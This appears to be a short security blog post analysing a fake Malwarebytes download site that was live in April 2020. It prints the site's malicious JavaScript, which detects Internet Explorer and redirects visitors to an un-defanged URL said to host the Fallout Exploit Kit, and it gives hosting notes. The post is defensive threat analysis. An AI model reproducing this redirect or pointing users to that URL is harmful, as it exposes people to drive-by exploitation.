Fake Malwarebytes Site

By:
Posted: April 8, 2020
Category: Malware and Behavior Analysis
Comments: 0

Recently we came across a fake Malwarebytes site that looked amazing. The site is http://www.malwarebytes-free[.]com/

The below screenshot shows the fake site which as of 4/8/2020 is still live.

 

This is a fake malwarebytes site

There is a JavaScript here that redirects the user to a malicious URL that hosts the Fallout Exploit Kit

 

Below is the malicious code –

<script async=”” src=”//www.googletagmanager.com/gtm.js?id=GTM-MKSKW3″></script><script src=”/js/jquery-1.11.3.min.js” type=”text/javascript”></script> <script type=”text/javascript”> if(navigator.appName.indexOf(“Internet Explorer”)!=-1 || navigator.userAgent.match(/Trident.*rv[ :]*11\./)) { //This user uses Internet Explorer window.location = “https://huston4u.london/6433/embryomas.dhtml?pYrAW=anchoveta” }

</script>

We will run this in our lab to see how it looks in the logs.

The ip addresses associated are :

The second ip address is hosted at:

Soft Layer - fake site

huston4u.london resolves to a server with DigitalOcean in New York

 

Hey, like this? Why not share it with a buddy?

Related Posts

You might also like...

phishing-kit

Read More →